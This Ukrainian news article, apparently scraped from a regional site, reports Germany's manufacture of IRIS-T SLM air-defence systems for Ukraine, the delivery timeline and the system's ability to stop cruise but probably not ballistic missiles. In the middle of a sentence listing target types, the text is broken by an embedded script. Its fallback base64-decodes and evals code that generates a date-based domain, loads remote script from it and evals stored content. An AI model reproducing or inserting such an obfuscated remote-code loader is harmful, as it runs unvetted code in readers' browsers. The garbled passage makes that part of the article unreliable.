Системи протиповітряної оборони IRIS-T, яких немає на озброєнні армії ФРН, Німеччина виготовляє спеціально для України.
Україна незабаром отримає системи ППО, які виробляють спеціально для неї. Це системи протиповітряної оборони IRIS-T, яких немає на озброєнні армії ФРН. Про це посол Німеччини в Україні Анка Фельдгузен розповіла в інтерв’ю Європейській правді.
За словами посла, перша система, ймовірно, буде поставлена вже у жовтні, друга – до кінця року, а ще дві – наступного року. Також вона наголосила, що немає жодної політичної проблеми щодо надання Україні озброєння, питання полягає лише у виробництві та ланцюгу поставок.
“Їх зараз виробляють, і я дуже сподіваюся, що друга буде до кінця року, а решта – наступного року. Це залежить не від політичної волі, там рішення чітко ухвалено. Це новітні системи, але ланцюг постачання для виробництва ускладнений”, — сказала Анка Фельдгузен.
Комплекс ППО IRIS-T SLM
Із самого початку роботи над проектом було передбачено модернізацію ракети для використання її в комплексі ППО – IRIS-T SL. Основну роботу було зроблено над збільшенням дальності польоту, оскільки стартувати треба було з землі.
В результаті компанія Diehl пропонує на ринку 3 варіанти:
IRIS-T SLS — комплекс ППО малої дальності;IRIS-T SLM — ППО середньої дальності;IRIS-T SLX — Комплекс ППО великої дальності. Розробляється з 2021 року.
Україні поставлятиметься комплекс середньої дальності. Він був формально прийнятий на озброєння в Німеччині у 2017 році, але реальних поставок у військо ще не здійснювалося.
Від чого захистить IRIS-T?
Чи може IRIS-T SLM «закрити небо» України? Європейський ЗРК — дуже сучасна та технологічна система протиповітряної оборони. Судячи з характеристик, може дуже ефективно боротися проти «аеродинамічних цілей». А до них належать: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Літаки (зокрема безпілотники);Гелікоптери (виявити вертоліт, що завис, дуже складно);Крилаті ракети.
Тобто IRIS-T SLM може впевнено «працювати» проти авіації росії, у тому числі проти ракет «Калібр» Х-55, Х-101 та інших дозвукових та надзвукових крилатих ракет. Немає жодних сумнівів, що комплекс зможе із досить високою ймовірністю знищити таку ціль. На випробуваннях він демонстрував такі можливості.
Що ж стосується балістичних ракет «Іскандер» і «Кинжал» (це той же «Іскандер», але запускається з літака. – Ред.), то жодних заяв від виробника або експертів, які заслуговують на довіру, можливості боротися з такими цілями немає.
Хоча принципових проблем із перехопленням балістичних ракет немає, для цього потрібні спеціалізовані системи протиракетної оборони (ПРО), наприклад THAAD або Patriot. Чи зможе IRIS-T SLM перехватити і збити балістичну ракету — не відомо.
Проблема перехоплення балістичних цілей полягає в тому, що така ракета летить на ціль практично вертикально зверху-вниз, з дуже великою швидкістю.
Для «Іскандера» це швидкість 750 метрів на секунду (2700 км/год), а це означає, що зону дії IRIS-T SLM (20 км по висоті) він подолає за 26 секунд, тоді як крилата ракета «Калібр» буде вразлива в протягом 2,7 хвилин, що у 6 разів більше.
Таким чином, ЗРК IRIS-T SLM зможе впевнено вражати цілі у своїй «зоні відповідальності» — літаки та крилаті ракети, балістичні ракети — швидше за все ні, адже його проектували та випробовували не для цього. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/ukrayina-otrimaye-eksklyuzivni-sistemi-ppo-chi-mozhut-voni-zakriti-nebo/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook